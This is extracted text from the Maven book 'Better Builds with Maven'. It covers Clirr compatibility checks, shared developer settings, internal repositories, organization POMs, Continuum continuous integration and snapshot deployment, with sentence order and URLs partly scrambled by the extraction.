good idea to monitor as many components as possible. you are monitoring the proficio-api component for binary compatibility changes only.. 204 .zip file.. as it will be used as the interface into the implementation by other applications. </plugins> </build> . This is the most important one to check. it is almost always preferable to deprecate an old API and add a new one.Better Builds with Maven These versions of proficio-api are retrieved from the repository.0 would be more stable in the long run. and to check them automatically. so that fewer people are affected.xml file.
codehaus.. and ignored in the same way that PMD does.Assessing Project Health with Maven If you now run mvn verify. you can create a very useful mechanism for identifying potential release disasters much earlier in the development process. This allows the results to be collected over time to form documentation about known incompatibilities for applications using the library. which is available at. you can choose to exclude that from the report by adding the following configuration to the plugin: . you will see that the build fails due to the binary incompatibility introduced between the 0.9 preview release and the final 1.mojo</groupId> <artifactId>clirr-maven-plugin</artifactId> <configuration> <excludes> <exclude>**/Proficio</exclude> </excludes> </configuration> . not just the one acceptable failure. and then act accordingly.. as well as strategies for evolving an API without breaking it.codehaus. However. the following articles and books can be recommended: • Evolving Java-based APIs contains a description of the problem of maintaining binary compatibility. and so is most useful for browsing. Built as a Javadoc doclet.org/jdiff-maven-plugin. This can be useful in getting a greater level of detail than Clirr on specific class changes.9 release. <plugin> <groupId>org. Hopefully a future version of Clirr will allow acceptable incompatibilities to be documented in the source code.0 version. With this simple setup. it will not pinpoint potential problems for you. • A similar tool to Clirr that can be used for analyzing changes between releases is JDiff. it takes a very different approach. it is listed only in the build configuration. and particularly so if you are designing a public API. so the report still lists the incompatibility. Since this was an acceptable incompatibility due to the preview nature of the 0... taking two source trees and comparing the differences in method signatures and Javadoc annotations. </plugin> This will prevent failures in the Proficio class from breaking the build in the future. 205 . A limitation of this feature is that it will eliminate a class entirely. While the topic of designing a strong public API and maintaining binary compatibility is beyond the scope of this book. Effective Java describes a number of practical rules that are generally helpful to writing code in Java. It has a functional Maven 2 plugin. Note that in this instance.
It is important that developers are involved in the decision making process regarding build constraints. but none related information from another report to itself. the Dashboard plugin). 206 . While some attempts were made to address this in Maven 1. will reduce the need to gather information from various sources about the health of the project. The purpose. and few of the reports aggregated information across a multiple module build.xml).0 (for example. as there is a constant background monitor that ensures the health of the project is being maintained. and as the report set stabilizes – summary reports will start to appear. How well this works in your own projects will depend on the development culture of your team. individual checks that fail the build when they're not met. In the absence of these reports. The additions and changes to Proficio made in this chapter can be found in the Code_Ch06-1. Best of all. none of the reports presented how the information changes over time other than the release announcements. The next chapter examines team development and collaboration. a new set of information about your project can be added to a shared Web site to help your team visualize the health of the project. the model remains flexible enough to make it easy to extend and customize the information published on your project web site. it is important that your project information not remain passive. regularly scheduled. Most Maven plugins allow you to integrate rules into the build that check certain constraints on that piece of information once it is well understood. of the visual display is to aid in deriving the appropriate constraints to use. to a focus on quality.11. However. Summary The power of Maven's declarative project model is that with a very simple setup (often only 4 lines in pom. Some of the reports linked to one another. along with techniques to ensure that the build checks are now automated. However. These are all important features to have to get an overall view of the health of a project. then.12. Once established. it requires a shift from a focus on time and deadlines. and run in the appropriate environment. 6. they did not address all of these requirements. and will be used as the basis for the next chapter. Finally. and incorporates the concepts learned in this chapter. enforcing good.0. Viewing Overall Project Health In the previous sections of this chapter. In some cases. and have not yet been implemented for Maven 2. so that they feel that they are achievable. a large amount of information was presented about a project.Better Builds with Maven 6. it should be noted that the Maven reporting API was written with these requirements in mind specifically.zip source archive. this focus and automated monitoring will have the natural effect of improving productivity and reducing time of delivery again. each in discrete reports.
7.Tom Clancy 207 .. .
Even when it is not localized. The Issues Facing Teams Software development as part of a team. This problem is particularly relevant to those working as part of a team that is distributed across different physical locations and timezones. faces a number of challenges to the success of the effort. the fact that everyone has direct access to the other team members through the CoRE framework reduces the time required to not only share information. rapid development. it's just as important that they don't waste valuable time researching and reading through too many information sources simply to find what they need.Better Builds with Maven 7. CoRE enables globally distributed development teams to cohesively contribute to high-quality software. it is obvious that trying to publish and disseminate all of the available information about a project would create a near impossible learning curve and generate a barrier to productivity. in rapid. project information can still be misplaced. However. These tools aid the team to organize. it does encompass a set of practices and tools that enable effective team communication and collaboration. and that existing team members become more productive and effective.1. An organizational and technology-based framework. although a distributed team has a higher communication overhead than a team working in a single location. and document for reuse the artifacts that result from a software project. While it's essential that team members receive all of the project information required to be productive. CoRE emphasizes the relationship between project information and project members. web-based communication channels and web-based project management tools. This problem gets exponentially larger as the size of the team increases. whether it is 2 people or 200 people. or forgotten. Even though teams may be widely distributed. component-based projects despite large. As teams continue to grow. A Community-oriented Real-time Engineering (CoRE) process excels with this information challenge. but also to incorporate feedback. iterative cycles. visualize. further contributing to the problem. While Maven is not tied directly to the CoRE framework. one of the biggest challenges relates to the sharing and management of development information. 208 . and dealing with differences in opinions. CoRE is based on accumulated learnings from open source projects that have achieved successful. Using the model of a community. widely-distributed teams. and asynchronous engineering. The CoRE approach to development also means that new team members are able to become productive quickly. However. This value is delivered to development teams by supporting project transparency. Many of these challenges are out of any given technology's control – for instance finding the right people for the team. real-time stakeholder participation. misinterpreted. repeating errors previously solved or duplicating efforts already made. which is enabled by the accessibility of consistently structured and organized information such as centralized code repositories. resulting in shortened development cycles. working on complex. every other member (and particularly new members). As each member retains project information that isn't shared or commonly accessible. will inevitably have to spend time obtaining this localized information. the key to the information issue in both situations is to reduce the amount of communication necessary to obtain the required information in the first place.
xml file. Without it.m2 subdirectory of your home directory (settings in this location take precedence over those in the Maven installation directory). and to user-specific profiles. This file can be stored in the conf directory of your Maven installation. because the environment will tend to evolve inconsistently once started that way. you learned how to create your own settings. it's a good idea to leverage Maven's two different settings files to separately manage shared and user-specific settings. the set up process for a new developer can be slow. This chapter also looks at the adoption and use of a consistent development environment. such as proxy settings. through the practice of continuous integration. while an individual developer's settings are stored in their home directory. To maintain build consistency. varying operating systems. The settings. In a shared development environment. Additionally. but also several that are typically common across users in a shared environment. these variables relate to the user and installation settings files. demonstrating how Maven provides teams with real-time information on the builds and health of a project. Maven can gather and share the knowledge about the health of a project. While one of Maven's objectives is to provide suitable conventions to reduce the introduction of inconsistencies in the build environment.Team Collaboration with Maven As described in Chapter 6. 7. there are unavoidable variables that remain. error-prone and full of omissions. 209 . multiple JDK versions. the key is to minimize the configuration required by each individual developer. In Chapter 2. and other discrete settings such as user names and passwords. How to Set up a Consistent Developer Environment Consistency is important when establishing a shared development environment. or in the . Common configuration settings are included in the installation directory.2. and the use of archetypes to ensure consistency in the creation of new projects. In this chapter. it will be the source of timeconsuming development problems in the future. this is taken a step further.xml file contains a number of settings that are user-specific. and to effectively define and declare them. while still allowing for this natural variability. In Maven. such as different installation locations for software.></pluginGroup> </pluginGroups> </settings> 210 .mycompany.com/internal/</url> </pluginRepository> </pluginRepositories> </profile> </profiles> <activeProfiles> <activeProfile>property-overrides</activeProfile> <activeProfile>default-repositories</activeProfile> </activeProfiles> <pluginGroups> <pluginGroup>com.mycompany. <maven home>/conf/settings.Better Builds with Maven The following is an example configuration file that you might use in the installation directory.mycompany.
username}. you can easily add and consistently roll out any new server and repository settings. The plugin groups are necessary only if an organization has plugins. By placing the common configuration in the shared settings. issues with inconsistently-defined identifiers and permissions are avoided. This profile will be defined in the user's settings file to set the properties used in the shared file.username>myuser</website.3 for more information on setting up an internal repository. Using the basic template. with only specific properties such as the user name defined in the user's settings. which are run from the command line and not defined in the POM. across users. The server settings will typically be common among a set of developers.username> </properties> </profile> </profiles> </settings> To confirm that the settings are installed correctly.3 of this chapter for more information on creating a mirror of the central repository within your own organization. While you may define a standard location that differs from Maven's default (for example. See section 7. internal repositories that contain a given organization's or department's released artifacts. the local repository is defined as the repository of a single user. such as ${website. These repositories are independent of the central repository in this configuration. which is typically one that has been set up within your own organization or department. ${user. Another profile.Team Collaboration with Maven There are a number of reasons to include these settings in a shared configuration: • • • • • • If a proxy server is allowed. at a single physical location. without having to worry about integrating local changes made by individual developers. you can view the merged result by using the following help plugin command: C:\mvnbook> mvn help:effective-settings 211 . The user-specific configuration is also much simpler as shown below: <settings> <profiles> <profile> <id>property-overrides</id> <properties> <website. it is important that you do not configure this setting in a way that shares a local repository. You'll notice that the local repository is omitted in the prior example. The active profiles listed enable the profile defined previously in every environment.home}/maven-repo). property-overrides is also enabled by default. The mirror element can be used to specify a mirror of a repository that is closer to you. See section 7. it would usually be set consistently across the organization or department. The previous example forms a basic template that is a good starting point for the settings file in the Maven installation. The profile defines those common. In Maven.
Now that each individual developer on the team has a consistent set up that can be customized as needed. download the Jetty 5. The following are a few methods to achieve this: • • • • Rebuild the Maven release distribution to include the shared configuration file and distribute it internally. Check the Maven installation into CVS. For more information on profiles. or if there are network problems. While any of the available transport protocols can be used. Apache Tomcat. or other custom solution.10-bundle.3.10 server bundle from the book's Web site and copy it to the repository directory. and when possible. Use an existing desktop management solution. organization's will typically want to set up what is referred to as an internal repository. so that multiple developers and teams can collaborate effectively. located in the project directory. easily updated. While it can be stored anywhere you have permissions. To set up Jetty. Subversion. or create a new server using Apache HTTPd. and run: C:\mvnbook\repository> java -jar jetty-5. This internal repository is still treated as a remote repository in Maven. Change to that directory. each execution will immediately be up-to-date. or other source control management (SCM) system. however it applies to all projects that are built in the developer's environment. but requires a manual procedure.jar 8081 212 . since not everyone can deploy to the central Maven repository. doing so will prevent Maven from being available off-line. Place the Maven installation on a read-only shared or network drive from which each developer runs the application. but it is also important to ensure that the shared settings are easily and reliably installed with Maven. create a new directory in which to store the files. To set up your organization's internal repository using Jetty. if M2_HOME is not set. You can use an existing HTTP server for this. it is possible to maintain multiple Maven installations.xml file. developers must use profiles in the profiles. Setting up an internal repository is simple. If necessary. or any number of other servers.Better Builds with Maven Separating the shared settings from the user-specific settings is helpful. For an explanation of the different types of repositories. If this infrastructure is available. just as any other external repository would be. Each developer can check out the installation into their own machines and run it from there. In some circumstances however. the most popular is HTTP.1. However. Jetty. A new release will be required each time the configuration is changed. To publish releases for use across different environments within their network. • Adjusting the path or creating symbolic links (or shortcuts) to the desired Maven executable. Retrieving an update from an SCM will easily update the configuration and/or installation. 7. see Chapter 2. Creating a Shared Repository Most organizations will need to set up one or more shared repositories. an individual will need to customize the build of an individual project.xml file covers the majority of use cases for individual developer customization. Configuring the settings. To do this. in this example C:\mvnbook\repository will be used. see Chapter 3. the next step is to establish a repository to and from which artifacts can be published and dependencies downloaded.1. by one of the following methods: • Using the M2_HOME environment variable to force the use of a particular installation.
you will want to set up or use an existing HTTP server that is in a shared. configured securely and monitored to ensure it remains running at all times. It is deployed to your Jetty server (or any other servlet container) and provides remote repository proxies. but rather than set up multiple web servers. it is common in many organizations as it eliminates the requirement for Internet access or proxy configuration. You can create a separate repository under the same server. The server is set up on your own workstation for simplicity in this example. and reporting.apache. • The Maven Repository Manager (MRM) is a new addition to the Maven build platform that is designed to administer your internal repository. C:\mvnbook\repository> mkdir internal It is also possible to set up another repository (or use the same one) to mirror content from the Maven central repository. searching. Use rsync to take a copy of the central repository and regularly update it. The repository manager can be downloaded from. This will download anything that is not already present. sftp and more. there are a number of methods available: • • Manually add content as desired using mvn deploy:deploy-file Set up the Maven Repository Manager as a proxy to the central repository. and keep a copy in your internal repository for others on your team to reuse. However.Team Collaboration with Maven You can now navigate to and find that there is a web server running displaying that directory. ftp. For the first repository. While this isn't required.8G. However. the size of the Maven repository was 5. accessible location. To populate the repository you just created. and gives full control over the set of artifacts with which your software is built. and is all that is needed to get started. it is possible to use a repository on another server with any combination of supported protocols including http. At the time of writing. it provides faster performance (as most downloads to individual developers come from within their own network). This creates an empty repository. Your repository is now set up. create a subdirectory called internal that will be available at. This chapter will assume the repositories are running from and that artifacts are deployed to the repositories using the file system. using the following command: C:\mvnbook\repository> mkdir central This repository will be available at. scp. separate repositories. by avoiding any reliance on Maven's relatively open central repository. For more information. 213 . as well as friendly repository browsing. In addition. Later in this chapter you will learn that there are good reasons to run multiple. you can store the repositories on this single server. refer to Chapter 3.org/repositorymanager/.
and as a result. as shown in section 7. there are two choices: use it as a mirror. if you want to prevent access to the central repository for greater control.. You would use it as a mirror if it is intended to be a copy of the central repository exclusively. On the other hand. you must define a repository in a settings file and/or POM that uses the identifier central. it would be a nightmare to change should the repository location change! The solution is to declare your internal repository (or central replacement) in the shared settings.Better Builds with Maven When using this repository for your projects. or had it in their source code check out. it would need to be declared in every POM. to configure the repository from the project level instead of in each user's settings (with one exception that will be discussed next). and if it's acceptable to have developers configure this in their settings as demonstrated in section 7. Not only is this very inconvenient. This makes it impossible to define the repository in the parent. that declares shared settings within an organization and its departments.2. or to include your own artifacts in the same repository. there is a problem – when a POM inherits from another POM that is not in the central repository. this must be defined as both a regular repository and a plugin repository to ensure all access is consistent. for a situation where a developer might not have configured their settings and instead manually installed the POM. or have it override the central repository. If you have multiple repositories. The next section discusses how to set up an “organization POM”. it is necessary to declare only those that contain an inherited POM. unless you have mirrored the central repository using one the techniques discussed previously.2. otherwise Maven will fail to download any dependencies that are not in your local repository. you should override the central repository. Repositories such as the one above are configured in the POM usually.xml file. Developers may choose to use a different mirror. or the original central repository directly without consequence to the outcome of the build. so that a project can add repositories itself for dependencies located out of those repositories configured initially. Usually. It is still important to declare the repositories that will be used in the top-most POM itself. However. or hierarchy. To override the central repository with your internal repository. it must retrieve the parent from the repository. 214 .
Since the version of the POM usually bears no resemblance to the software. 215 .0.0</modelVersion> <parent> <groupId>org.apache. By declaring shared elements in a common parent POM. It is important to recall. and is a project that. etc. consider the POM for Maven SCM: <project> <modelVersion>4.Team Collaboration with Maven 7.xml file in the shared installation (or in each developer's home directory). depending on the information that needs to be shared.org/maven-scm/</url> . that if your inherited projects reside in an internal repository. or the organization as a whole. Future versions of Maven plan to automate the numbering of these types of parent projects to make this easier. so it's possible to have one or more parents that define elements common to several projects. from section 7..0 – that is. These parents (levels) may be used to define departments. has a number of sub-projects (Maven.apache. Maven SCM. As an example. It is a part of the Apache Software Foundation. its departments. As a result.3. To continue the Maven example. as this is consistent information. wherein there's the organization. Any number of levels (parents) can be used. itself.. <modules> <module>maven-scm-api</module> <module>maven-scm-providers</module> . there are three levels to consider when working with any individual module that makes up the Maven project.). project inheritance can be used to assist in ensuring project consistency. While project inheritance was limited by the extent of a developer's checkout in Maven 1.. the easiest way to version a POM is through sequential numbering.. consider the Maven project itself. the current project – Maven 2 now retrieves parent projects from the repository. Maven Continuum. consistency is important when setting up your build infrastructure.maven</groupId> <artifactId>maven-parent</artifactId> <version>1</version> </parent> <groupId>org. and then the teams within those departments. </modules> </project> If you were to review the entire POM.apache.maven. you'd find that there is very little deployment or repositoryrelated information. Creating an Organization POM As previously mentioned in this chapter. which is shared across all Maven projects through inheritance. then that repository will need to be added to the settings. This project structure can be related to a company structure.4.scm</groupId> <artifactId>maven-scm</artifactId> <url>. You may have noticed the unusual version declaration for the parent project.
org/</url> .org</post> ..apache</groupId> <artifactId>apache</artifactId> <version>1</version> </parent> <groupId>org.apache. </mailingList> </mailingLists> <developers> <developer> ..apache.maven</groupId> <artifactId>maven-parent</artifactId> <version>5</version> <url></modelVersion> <parent> <groupId>org.. <mailingLists> <mailingList> <name>Maven Announcements List</name> <post>announce@maven.. you'd see it looks like the following: <project> <modelVersion>4..apache.Better Builds with Maven If you look at the Maven project's parent POM.0. </developer> </developers> </project> 216 ..
modified.apache. 217 . the Maven Repository Manager will allow POM updates from a web interface). and deployed with their new version as appropriate.apache. </snapshotRepository> </distributionManagement> </project> The Maven project declares the elements that are common to all of its sub-projects – the snapshot repository (which will be discussed further in section 7. <distributionManagement> <repository> .apache</groupId> <artifactId>apache</artifactId> <version>1</version> <organization> <name>Apache Software Foundation</name> <url>. you can retain the historical versions in the repository if it is backed up (in the future.. For this reason.apache. and the deployment locations. there is no best practice requirement to even store these files in your source control management system. is regarding the storage location of the source POM files...6). Source control management systems like CVS and SVN (with the traditional intervening trunk directory at the individual project level) do not make it easy to store and check out such a structure. it is best to store the parent POM files in a separate area of the source control tree. where they can be checked out. most of the elements are inherited from the organization-wide parent project. Again.snapshots</id> <name>Apache Snapshot Repository</name> <url></modelVersion> <groupId>org.Team Collaboration with Maven The Maven parent POM includes shared elements.org/</url> ... and less frequent schedule than the projects themselves. when working with this type of hierarchy. An issue that can arise.0. In fact. <repositories> <repository> <id>apache. These parent POM files are likely to be updated on a different. such as the announcements mailing list and the list of developers that work across the whole project.org/maven-snapshot-repository</url> <releases> <enabled>false</enabled> </releases> </repository> </repositories> ...org/</url> </organization> <url>. in this case the Apache Software Foundation: <project> <modelVersion>4. </repository> <snapshotRepository> .
continuous integration can enable a better development culture where team members can make smaller.Better Builds with Maven 7. and learn how to use Continuum to build this project on a regular basis. and you must stop the server to make the changes (to stop the server. For most installations this is all the configuration that's required. The configuration on the screen is straight forward – all you should need to enter are the details of the administration account you'd like to use. The examples discussed are based on Continuum 1. as well as the generic bin/plexus. First.3. press Ctrl-C in the window that is running Continuum).3> bin\win32\run There are scripts for most major platforms.0. iterative changes that can more easily support concurrent development processes. As of Continuum 1. The first screen to appear will be the one-time setup page shown in figure 7-1.3.org/. and the company information for altering the logo in the top left of the screen. continuous integration enables automated builds of your project on a regular interval. you will need to install Continuum. As such. however.sh for use on other Unix-based platforms. More than just nightly builds. you will pick up the Proficio example from earlier in the book. This is very simple – once you have downloaded it and unpacked it.0. ensuring that conflicts are detected earlier in a project's release life cycle.5. In this chapter. however newer versions should be similar. if you are running Continuum on your desktop and want to try the examples in this section. The examples also assumes you have Subversion installed. Continuous Integration with Continuum If you are not already familiar with it. you can run it using the following command: C:\mvnbook\continuum-1. Continuum is Maven's continuous integration and build server. Starting up continuum will also start a http server and servlet engine.tigris. continuous integration is a key element of effective collaboration. which you can obtain for your operating system from. some additional steps are required. 218 . You can verify the installation by viewing the web site at. rather than close to a release.0. these additional configuration requirements can be set only after the previous step has been completed.
you can cut and paste field values from the following list: Field Name Value working-directory Working Directory Build Output Directory build-output-directory Base URL 219 .Team Collaboration with Maven Figure 7-1: The Continuum setup screen To complete the Continuum setup page.
If you do not have this set up on your machine. You can then check out Proficio from that location. To enable this setting. you will also need an SMTP server to which to send the messages. since paths can be entered from the web interface. This requires obtaining the Code_Ch07. By default.org/continuum/guides/mini/guide-configuration. you can start Continuum again.. this is disabled as a security measure. refer to.. For instructions. <implementation> org.Better Builds with Maven In the following examples.. edit apps/continuum/conf/application.xml and verify the following line isn't commented out: ..apache.validation. POM files will be read from the local hard disk where the server is running. edit the file above to change the smtp-host setting. for example if it was unzipped in C:\mvnbook\svn: C:\mvnbook> svn co \ proficio 220 . <allowedScheme>file</allowedScheme> </allowedSchemes> </configuration> .codehaus. After these steps are completed.formica.html... The next step is to set up the Subversion repository for the examples.plexus. The default is to use localhost:25. To have Continuum send you e-mail notifications.UrlValidator </implementation> <configuration> <allowedSchemes> .zip archive and unpacking it in your environment.
The ciManagement section is where the project's continuous integration is defined and in the above example has been configured to use Continuum locally on port 8080... <scm> <connection> scm:svn: </connection> <developerConnection> scm:svn: </developerConnection> </scm> .xml to correct the e-mail address to which notifications will be sent..version} </url> </site> </distributionManagement> . Once these settings have been edited to reflect your setup.Team Collaboration with Maven The POM in this repository is not completely configured yet..xml You should build all these modules to ensure everything is in order. with the following command: C:\mvnbook\proficio> mvn install 221 ...3 for information on how to set this up. from the directory C:\mvnbook\repository.. If you haven't done so already. <ciManagement> <system>continuum</system> <url> <notifiers> <notifier> <type>mail</type> <configuration> <address>youremail@yourdomain. This assumes that you are still running the repository Web server on localhost:8081. by uncommenting and modifying the following lines: .com</address> </configuration> </notifier> </notifiers> </ciManagement> .. since not all of the required details were known at the time of its creation. refer to section 7. Edit proficio/pom. The distributionManagement setting will be used in a later example to deploy the site from your continuous integration environment. and edit the location of the Subversion repository. <distributionManagement> <site> <id>website</id> <url> /reference/${project. commit the file with the following command: C:\mvnbook\proficio> svn ci -m 'my settings' pom.
You have two options: you can provide the URL for a POM. a ViewCVS installation. under the Continuum logo. Figure 7-2: Add project screen shot This is all that is required to add a Maven 2 project to Continuum.0. If you return to the location that was set up previously. When you set up your own system later. Once you have logged in. enter the file:// URL as shown. or a Subversion HTTP server. you must either log in with the administrator account you created during installation. and each of the modules will be added to the list of projects. The login link is at the top-left of the screen. Instead.3 this does not work when the POM contains modules. you can now select Maven 2. Before you can add a project to the list. After submitting the URL. you will see an empty project list. as in the Proficio example. Continuum will return to the project summary page.Better Builds with Maven You are now ready to start using Continuum. the builds will be marked as New and their checkouts will be queued.0+ Project from the Add Project menu. or with another account you have since created with appropriate permissions. The result is shown in figure 7-3. in Continuum 1. or upload from your local drive. Initially. While uploading is a convenient way to configure from your existing check out. This will present the screen shown in figure 7-2. or perform other tasks. 222 . you will enter either a HTTP URL to a POM in the repository.
Team Collaboration with Maven Figure 7-3: Summary page after projects have built Continuum will now build the project hourly. the build will show an “In progress” status. The Build History link can be used to identify the failed build and to obtain a full output log. but you may wish to go ahead and try them. restore the file above to its previous state and commit it again. First. If you want to put this to the test. and then fail. you might want to set up a notification to your favorite instant messenger – IRC.java. go to your earlier checkout and introduce an error into Proficio. This chapter will not discuss all of the features available in Continuum. Jabber. 223 .] Now.. MSN and Google Talk are all supported.java Finally. To avoid receiving this error every hour. The build in Continuum will return to the successful state.. marking the left column with an “!” to indicate a failed build (you will need to refresh the page using the Show Projects link in the navigation to see these changes). In addition.. remove the interface keyword: [.. For example. check the file in: C:\mvnbook\proficio\proficio-api> svn ci -m 'introduce error' \ src/main/java/com/mergere/mvnbook/proficio/Proficio. for example. you should receive an e-mail at the address you configured earlier.] public Proficio [. press Build Now on the Continuum web interface next to the Proficio API module. and send an e-mail notification if there are any problems.
but regular schedule is established for site generation. based on selected schedules. While this seems obvious. Continuum can be configured to trigger a build whenever a commit occurs. for example. Continuous integration is most effective when developers commit regularly. iterative builds are helpful in some situations. and independent of the environment being used. test and production environments. Avoid customizing the JDK. This will be constrained by the length of the build and the available resources on the build machine. but rather keeping changes small and well tested. operating system and other variables. 224 . In addition. • • • • • • • In addition to the above best practices. Run a copy of the application continuously. if it isn't something already in use in other development. Consider a regular. Continuous integration is most beneficial when tests are validating that the code is working as it always has. commit often. Build all of a project's active branches. Fix builds as soon as possible. if the source control repository supports postcommit hooks. not just that the project still compiles after one or more changes occur.Better Builds with Maven Regardless of which continuous integration server you use. before the developer moves on or loses focus. Establish a stable environment. separate from QA and production releases. Continuous integration will be pointless if developers repetitively ignore or delete broken build notifications. and a future version will allow developers to request a fresh checkout. If the application is a web application. there are two additional topics that deserve special attention: automated updates to the developer web site. For these reports to be of value. or local settings. it is important that it can be isolated to the change that caused it. Run comprehensive tests. it is recommend that a separate. This will make it much easier to detect the source of an error when the build does break. This can be helpful for non-developers who need visibility into the state of the application. they need to be kept up-todate. you learned how to create an effective site containing project information and reports about the project's health and vitality. the continuous integration environment should be set up for all of the active branches. This doesn’t mean committing incomplete code. it is often ignored. it is also important that failures don't occur due to old build state. clean build. it is beneficial to test against all different versions of the JDK. In Chapter 6. but it is best to detect a failure as soon as possible. Continuum has preliminary support for system profiles and distributed testing. If multiple branches are in development. run a servlet container to which the application can be deployed from the continuous integration environment. there are a few tips for getting the most out of the system: • Commit early. Continuum currently defaults to doing a clean build. periodically. and profile usage. Run builds as often as possible. This is another way continuous integration can help with project collaboration and communication. This also means that builds should be fast – long integration and performance tests should be reserved for periodic builds. When a failure occurs in the continuous integration environment. enhancements that are planned for future versions. and your team will become desensitized to the notifications in the future. Though it would be overkill to regenerate the site on every commit. Run clean builds. While rapid.
select Schedules. It is not typically needed if using Subversion. 16:00:00 from Monday to Friday.Team Collaboration with Maven Verify that you are still logged into your Continuum instance. only the default schedule is available. You will see that currently. since commits are not atomic and a developer might be committing midway through a update.html. 9:00:00. which will be configured to run every hour during business hours (8am – 4pm weekdays). The example above runs at 8:00:00. Next. The appropriate configuration is shown in figure 7-4.. Click the Add button to add a new schedule. This is useful when using CVS.. Figure 7-4: Schedule configuration To complete the schedule configuration. The “quiet period” is a setting that delays the build if there has been a commit in the defined number of seconds prior.opensymphony.. 225 . from the Administration menu on the left-hand side..com/quartz/api/org/quartz/CronTrig.
In Continuum 1. so you will need to add the definition to each module individually. Maven Proficio.xml clean site-deploy --batch-mode -DenableCiProfile=true The goals to run are clean and site-deploy. as well – if this is a concern. click the Add button below the default build definition.0. there is no way to make bulk changes to build definitions. Figure 7-5: Adding a build definition for site deployment To complete the Add Build Definition screen. you can cut and paste field values from the following list: Field Name Value POM filename Goals Arguments pom. but does not recurse into the modules (the -N or --non-recursive argument). which will be visible from. and add the same build definition to all of the modules. use the non-recursive mode instead. 226 . and select the top-most project. Since this is the root of the multi-module build – and it will also detect changes to any of the modules – this is the best place from which to build the site. The Add Build Definition screen is shown in figure 7-5.Better Builds with Maven Once you add this schedule. To add a new build definition. In addition to building the sites for each module. The site will be deployed to the file system location you specified in the POM. return to the project list. when you first set up the Subversion repository earlier in this chapter. The project information shows just one build on the default schedule that installs the parent POM. In this example you will add a new build definition to run the site deployment for the entirety of the multi-module build. The downside to this approach is that Continuum will build any unchanged modules.3. it can aggregate changes into the top-level site as required. on the business hours schedule.
which means that Build Now from the project summary page will not trigger this build. you can add the test. However. you'll see that these checks have now been moved to a profile. Profiles are a means for selectively enabling portions of the build.... In the previous example. You can see also that the schedule is set to use the site generation schedule created earlier.xml file in your Subversion checkout to that used in Chapter 6. The --non-recursive option is omitted. 227 . which can be a discouragement to using them. Any of these test goals should be listed after the site-deploy goal. a system property called enableCiProfile was set to true. . and view the generated site from. If you haven't previously encountered profiles. <profiles> <profile> <id>ciProfile</id> <activation> <property> <name>enableCiProfile</name> <value>true</value> </property> </activation> <plugins> <plugin> <groupId>org. the generated site can be used as reference for what caused the failure. which is essential for all builds to ensure they don't block for user input. so that if the build fails because of a failed check. However. If you compare the example proficio/pom.. You'll find that when you run the build from the command line (as was done in Continuum originally). these checks delayed the build for all developers. which sets the given system property. verify or integration-test goal to the list of goals. none of the checks added in the previous chapter are executed. In this particular case. However.Team Collaboration with Maven The arguments provided are --batch-mode.apache. In Chapter 6. please refer to Chapter 3. such as the percentage of code covered in the unit tests dropping below a certain value. each build definition on the project information page (to which you would have been returned after adding the build definition) has a Build Now icon. The meaning of this system property will be explained shortly. since most reports continue under failure conditions. Click this for the site generation build definition. a number of plugins were set up to fail the build if certain project health checks failed. if you want to fail the build based on these checks as well. to ensure these checks are run. the profile is enabled only when the enableCiProfile system property is set to true. The checks will be run when you enable the ciProfile using mvn -DenableCiProfile=true. It is rare that the site build will fail.maven.plugins</groupId> <artifactId>maven-pmd-plugin</artifactId> <executions> . and -DenableCiProfile=true. and that it is not the default build definition.
which are not changed. but the timing and configuration can be changed depending upon your circumstances.xml file in <maven home>/conf/settings. <activeProfile>ciProfile</activeProfile> </activeProfiles> . and clicking Edit next to the default build definition. the verify goal may need to be added to the site deployment build definition. the build involves checking out all of the dependent projects and building them yourself. In this section. As you saw before.6. or for the entire multi-module project to run the additional checks after the site has been generated. As Maven 2 is still executed as normal.. for all projects in Continuum. How you configure your continuous integration depends on the culture of your development team and other environmental factors such as the size of your projects and the time it takes to build and test them. The generated artifacts of the snapshot are stored in the local repository. these artifacts will be updated frequently. as discussed previously.xml file for the user under which it is running. it may be necessary to schedule them separately for each module.8 of this chapter.xml: . and in contrast to regular dependencies.home}/. you will learn about using snapshots more effectively in a team environment. Team Dependency Management Using Snapshots Chapter 3 of this book discussed how to manage your dependencies in a multi-module build.. indicates that the profile is always active when these settings are read. The guidelines discussed in this chapter will help point your team in the right direction. in an environment where a number of modules are undergoing concurrent development. Snapshots were designed to be used in a team environment as a means for sharing development versions of artifacts that have already been built. 228 . Usually. To enable this profile by default from these settings. For example. the team dynamic makes it critical. if the additional checks take too much time for frequent continuous integration builds. at least in the version of Continuum current at the time of writing. The other alternative is to set this profile globally. The first is to adjust the default build definition for each module. as well as the settings in the Maven installation. In this case the identifier of the profile itself. add the following configuration to the settings... <activeProfiles> . and how to enable this within your continuous integration environment.. Projects in Maven stay in the snapshot state until they are released.Better Builds with Maven There are two ways to ensure that all of the builds added in Continuum use this profile. and while dependency management is fundamental to any Maven build. by going to the module information page. So far in this book. in some cases.m2/settings. where projects are closely related. it is necessary to do this for each module individually. which is discussed in section 7. it reads the ${user. you must build all of the modules simultaneously from a master build.. 7. snapshots have been used to refer to the development version of an individual module. Additionally. rather than the property used to enable it.
use binary snapshots that have been already built and tested.Team Collaboration with Maven While building all of the modules from source can work well and is handled by Maven inherently. this is achieved by regularly deploying snapshots to a shared repository.jar. <distributionManagement> <repository> <id>internal</id> <url></url> </repository> .. the version used is the time that it was deployed (in the UTC timezone) and the build number. building from source doesn't fit well with an environment that promotes continuous integration.131114-1. the Proficio project itself is not looking in the internal repository for dependencies..xml: . While this is not usually the case. locking the version in this way may be important if there are recent changes to the repository that need to be ignored temporarily. This technique allows you to continue using the latest version by declaring a dependency on 1. or to lock down a stable version by declaring the dependency version to be the specific equivalent such as 1. If you were to deploy again... </distributionManagement> Now. but rather relying on the other modules to be built first. <repositories> <repository> <id>internal</id> <url></url> </repository> </repositories> ..0-20060211. Considering that example.xml: .. Instead. Currently..0-20060211. In Maven. 229 . The filename that is used is similar to proficio-api-1. In this case.3. deploy proficio-api to the repository with the following command: C:\mvnbook\proficio\proficio-api> mvn deploy You'll see that it is treated differently than when it was installed in the local repository. it can lead to a number of problems: • • • • It relies on manual updates from developers.131114-1.. which can be error-prone. such as the internal repository set up in section 7. you'll see that the repository was defined in proficio/pom. add the following to proficio/pom.. To add the internal repository to the list of repositories used by Proficio regardless of settings.0SNAPSHOT. the time stamp would change and the build number would increment to 2. though it may have been configured as part of your settings files.
